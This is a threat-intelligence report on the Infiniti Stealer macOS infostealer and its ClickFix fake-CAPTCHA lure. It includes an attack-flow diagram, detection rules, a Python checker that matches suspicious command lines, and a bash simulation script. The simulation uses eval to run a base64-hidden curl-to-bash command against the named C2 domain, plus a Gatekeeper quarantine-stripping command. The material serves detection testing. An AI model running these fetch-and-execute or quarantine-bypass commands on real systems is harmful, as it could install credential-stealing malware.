Infiniti Stealer: a new macOS infostealer using ClickFix and Python/Nuitka
Summary
A newly identified macOS infostealer named Infiniti Stealer has been seen using a ClickFix social-engineering lure to infect users. The malware is built with Nuitka, which converts Python code into a native Mach-O binary, making static inspection more difficult. Once executed, it steals credentials, Keychain data, cryptocurrency wallet files, and other sensitive information, then exfiltrates the collected data through HTTP POST requests. The campaign also relies on a fake CAPTCHA page hosted on a malicious domain to trick victims into running a harmful Bash command.
Investigation
Researchers uncovered the payload during routine threat hunting and first tracked it under the temporary name NukeChain before the threat actor’s panel exposed the final branding as Infiniti Stealer. Analysis revealed a three-stage flow: a Bash dropper delivered through a fake CAPTCHA, a Nuitka-compiled loader, and a Python-based stealer module. The dropper places the binary in /tmp, strips the quarantine attribute, and launches it while passing C2 details through environment variables. The final stage gathers data from browsers, Keychain, wallets, and developer-related files before sending it to the attacker-controlled server.
Mitigation
Users should never copy and run commands from unknown websites, especially pages pretending to verify CAPTCHA challenges. Defenders should inspect and remove suspicious files in /tmp or ~/Library/LaunchAgents, run a trusted anti-malware scan, and rotate passwords for any potentially exposed accounts from a clean system. Any active API tokens or SSH keys that may have been collected should also be revoked.
Response
Detection teams should monitor for the dropper script and the Nuitka-compiled binary by watching file creation in /tmp that matches the described naming pattern. Alerts should trigger on execution of the malicious Bash command and on outbound HTTP POST traffic to the identified C2 domain. Network access to update-check.com and infiniti-stealer.com should be blocked. A host-based forensic review should then identify stolen credentials and support mandatory credential resets.
Attack Flow
graph TB
%% Class definitions section
classDef action fill:#99ccff
classDef tool fill:#ffcc99
classDef malware fill:#ff9999
classDef process fill:#ccffcc
classDef artifact fill:#cccccc
classDef operator fill:#ff9900
%% Node definitions
action_initial_access["<b>Action</b> – <b>T1204.004 User Execution: Malicious Copy and Paste</b><br/><b>Description</b>: Victim copies and pastes a malicious command into a terminal, leading to code execution."]
class action_initial_access action
artifact_captcha_page["<b>Artifact</b> – <b>Fake CAPTCHA page</b><br/>URL: update-check.com<br/>Provides copy-paste command to the victim."]
class artifact_captcha_page artifact
action_execution_dead_drop["<b>Action</b> – <b>T1102.001 Web Service: Dead Drop Resolver</b><br/><b>Description</b>: Uses a web service as a dead-drop to retrieve additional payloads."]
class action_execution_dead_drop action
process_curl_download["<b>Process</b> – <b>curl</b><br/><b>Command</b>: curl -sSfL … | bash<br/>Downloads stage-1 Bash dropper."]
class process_curl_download process
artifact_temp_binary["<b>Artifact</b> – <b>Temporary binary</b><br/>Location: /tmp/<br/>Quarantine flag removed after download."]
class artifact_temp_binary artifact
action_defense_evasion_sandbox["<b>Action</b> – <b>T1497.002 User Activity Checks</b> & <b>T1497.003 Time Based Evasion</b><br/><b>Description</b>: Detects virtualization or analysis environments before proceeding."]
class action_defense_evasion_sandbox action
action_guardrails["<b>Action</b> – <b>T1480.002 Execution Guardrails: Mutual Exclusion</b><br/><b>Description</b>: Ensures only a single instance runs on the host."]
class action_guardrails action
action_file_deletion["<b>Action</b> – <b>T1070.004 File Deletion</b><br/><b>Description</b>: Deletes temporary files and logs after use."]
class action_file_deletion action
action_obfuscation["<b>Action</b> – <b>T1027.005 Obfuscated Files or Information</b><br/><b>Description</b>: Uses obfuscation to hide malicious payloads."]
class action_obfuscation action
action_collection_input_capture["<b>Action</b> – <b>T1056 Input Capture</b><br/><b>Description</b>: Captures browser credentials, keychain entries, crypto wallet data, and screenshots."]
class action_collection_input_capture action
artifact_collected_data["<b>Artifact</b> – <b>Collected Sensitive Data</b><br/>Browser credentials, keychain entries, crypto wallet files, screenshots."]
class artifact_collected_data artifact
action_exfiltration_alternative["<b>Action</b> – <b>T1048 Exfiltration Over Alternative Protocol</b><br/><b>Description</b>: Sends data via HTTP POST to a remote server."]
class action_exfiltration_alternative action
artifact_c2_domain["<b>Artifact</b> – <b>C2 Domain</b><br/>update-check.com"]
class artifact_c2_domain artifact
artifact_telegram_notification["<b>Artifact</b> – <b>Telegram Notification</b><br/>Attacker receives status updates via Telegram."]
class artifact_telegram_notification artifact
action_lateral_tool_transfer["<b>Action</b> – <b>T1570 Lateral Tool Transfer</b><br/><b>Description</b>: Downloads additional payloads on demand for further compromise."]
class action_lateral_tool_transfer action
artifact_additional_payload["<b>Artifact</b> – <b>Additional Payloads</b><br/>Downloaded as needed for later stages."]
class artifact_additional_payload artifact
%% Connections showing flow
action_initial_access -->|delivers| artifact_captcha_page
artifact_captcha_page -->|triggers| action_execution_dead_drop
action_execution_dead_drop -->|uses| process_curl_download
process_curl_download -->|writes| artifact_temp_binary
artifact_temp_binary -->|enables| action_defense_evasion_sandbox
action_defense_evasion_sandbox -->|includes| action_guardrails
action_defense_evasion_sandbox -->|includes| action_file_deletion
action_defense_evasion_sandbox -->|includes| action_obfuscation
action_file_deletion -->|removes| artifact_temp_binary
action_obfuscation -->|obfuscates| artifact_temp_binary
action_defense_evasion_sandbox -->|leads_to| action_collection_input_capture
action_collection_input_capture -->|captures| artifact_collected_data
artifact_collected_data -->|sent_via| action_exfiltration_alternative
action_exfiltration_alternative -->|targets| artifact_c2_domain
artifact_c2_domain -->|notifies| artifact_telegram_notification
action_exfiltration_alternative -->|enables| action_lateral_tool_transfer
action_lateral_tool_transfer -->|downloads| artifact_additional_payload
Detections
- Possible Defense Evasion by Bypassing MacOS Gatekeeper (via cmdline)
- Possible Base64 Encoded Strings Manipulation [MacOS] (via cmdline)
- Suspicious Curl Execution Attempt [MacOS] (via cmdline)
- IOCs (HashMd5) to detect: Infiniti Stealer: a new macOS infostealer using ClickFix and Python/Nuitka
- IOCs (HashSha256) to detect: Infiniti Stealer: a new macOS infostealer using ClickFix and Python/Nuitka
- Detection of Infiniti Stealer Infection via Terminal Command Execution [Linux Process Creation]
Simulation Execution
Prerequisite: The Telemetry & Baseline Pre‑flight Check must have passed.
Attack Narrative & Commands
An attacker delivers a phishing link that, when opened on a macOS workstation, runs the following one‑liner in Terminal. The command:
- Downloads the payload from a base64-encoded URL (the payload host) via curl -sSfL.
- Decodes the base64 string to reveal the actual HTTPS URL.
- Executes the downloaded script with bash.
- Runs it under nohup to keep it alive after the terminal is closed.
- Strips the quarantine attribute (xattr -dr com.apple.quarantine) to bypass Gatekeeper.
These steps produce the exact command‑line fragments the Sigma rule is watching for, thereby generating the expected alert.
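As an added example (not from the report, and not the vendor's rule set), the checker below applies those same fragments to constructed sample process-creation command lines, decoding any base64 token so a hidden URL can be matched against the C2 domains named in the Response section. The rule names, patterns and sample events are assumptions made for the illustration.

```python
import base64
import binascii
import re

# Constructed sample process-creation events (not real telemetry): the command
# lines a macOS endpoint agent would record for children of Terminal.
SAMPLE_EVENTS = [
    "bash <(curl -sSfL $(echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 | base64 --decode))",
    "nohup bash -c 'bash <(curl -sSfL https://update-check.com/m/7d8df27d95d9)' >/dev/null 2>&1 &",
    "xattr -dr com.apple.quarantine /Applications/Utilities/Terminal.app",
    "curl -sSfL https://example.org/install.sh -o /tmp/install.sh",  # download only, no shell
    "ls -la /tmp",
]

# Domains named in the report's Response section; matched in raw or decoded text.
C2_DOMAINS = ("update-check.com", "infiniti-stealer.com")

# One pattern per command-line fragment the narrative lists (rule names are assumed).
RULES = {
    "gatekeeper_bypass": re.compile(r"\bxattr\s+-[a-z]*d[a-z]*\s+com\.apple\.quarantine\b"),
    "base64_decode": re.compile(r"\bbase64\s+(?:--decode|-[dD])\b"),
    "curl_to_shell": re.compile(r"\b(?:ba)?sh\s+<\(\s*curl\b|\bcurl\b[^|]*\|\s*(?:ba)?sh\b"),
    "nohup_persistence": re.compile(r"\bnohup\b.*\bbash\b"),
}
B64_TOKEN = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")


def decode_b64_tokens(cmdline):
    """Return printable ASCII strings hidden in base64-looking tokens of a command line."""
    decoded = []
    for token in B64_TOKEN.findall(cmdline):
        try:
            text = base64.b64decode(token, validate=True).decode("ascii")
        except (binascii.Error, UnicodeDecodeError):
            continue  # not valid base64, or not text: ignore the token
        if text.isprintable():
            decoded.append(text)
    return decoded


def analyze(cmdline):
    """Match one command line against RULES and surface any C2 domain it references."""
    rules = sorted(name for name, pat in RULES.items() if pat.search(cmdline))
    haystack = " ".join([cmdline.lower()] + [t.lower() for t in decode_b64_tokens(cmdline)])
    c2 = sorted(d for d in C2_DOMAINS if d in haystack)
    return {"cmdline": cmdline, "rules": rules, "c2": c2}


def is_infiniti_chain(findings):
    """curl fed into a shell, with the URL either base64-hidden or pointing at a known C2."""
    return "curl_to_shell" in findings["rules"] and bool(findings["c2"] or "base64_decode" in findings["rules"])


if __name__ == "__main__":
    for event in SAMPLE_EVENTS:
        f = analyze(event)
        print(f"{'CHAIN' if is_infiniti_chain(f) else '     '} {f['rules'] or '-'} {f['c2']} | {event[:60]}")
```

Only the first two events are flagged as the full chain; the bare xattr call and the download-only curl each hit at most a single rule, which is where the separate Gatekeeper and curl detections above earn their keep.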
Regression Test Script
#!/usr/bin/env bash
# ------------------------------------------------------------
# Infiniti Stealer infection simulation (macOS)
# ------------------------------------------------------------
# Run on an isolated test host. If update-check.com is blocked (see Response),
# curl -f exits non-zero and nothing is executed, but the process-creation
# telemetry the rule matches on is still generated.
# 1. Build the malicious one-liner (exactly as the rule expects).
#    Single quotes keep $(...) unexpanded until eval runs it.
MALICIOUS_CMD='bash <(curl -sSfL $(echo aHR0cHM6Ly91cGRhdGUtY2hlY2suY29tL20vN2Q4ZGYyN2Q5NWQ5 | base64 --decode))'
# 2. Optional persistence helpers (included in detection). Kept as separate
#    commands: appending them with "&&" after a trailing "&" is a bash syntax error.
NOHUP_CMD="nohup bash -c '$MALICIOUS_CMD' >/dev/null 2>&1 &"
XATTR_CMD="xattr -dr com.apple.quarantine /Applications/Utilities/Terminal.app"
# 3. Execute the commands
eval "$MALICIOUS_CMD"
eval "$NOHUP_CMD"
eval "$XATTR_CMD"
# 4. Wait a few seconds to allow SIEM ingestion
sleep 5
# 5. Output a marker for manual verification
echo ">>> Simulation executed - monitor SIEM for alert <<<"
Cleanup Commands
#!/usr/bin/env bash
# ------------------------------------------------------------
# Cleanup after Infiniti Stealer simulation
# ------------------------------------------------------------
# Kill any background nohup processes started by the simulation
# (pkill returns non-zero when nothing matches; that is fine here)
pkill -f "bash <(curl -sSfL" || true
# Remove the first temporary file that might have been created.
# Guard against an empty match, which would otherwise turn into "rm -f /tmp/".
TMP_FILE=$(ls /tmp | grep -E 'tmp|bash|curl' | head -n 1)
if [ -n "$TMP_FILE" ]; then
    rm -f "/tmp/$TMP_FILE"
fi
# Restore quarantine attribute on Terminal (optional, for hygiene)
xattr -w com.apple.quarantine "0081;5f4a9b2c;Safari;1234567890" /Applications/Utilities/Terminal.app 2>/dev/null || true
echo "Cleanup completed."
End of Report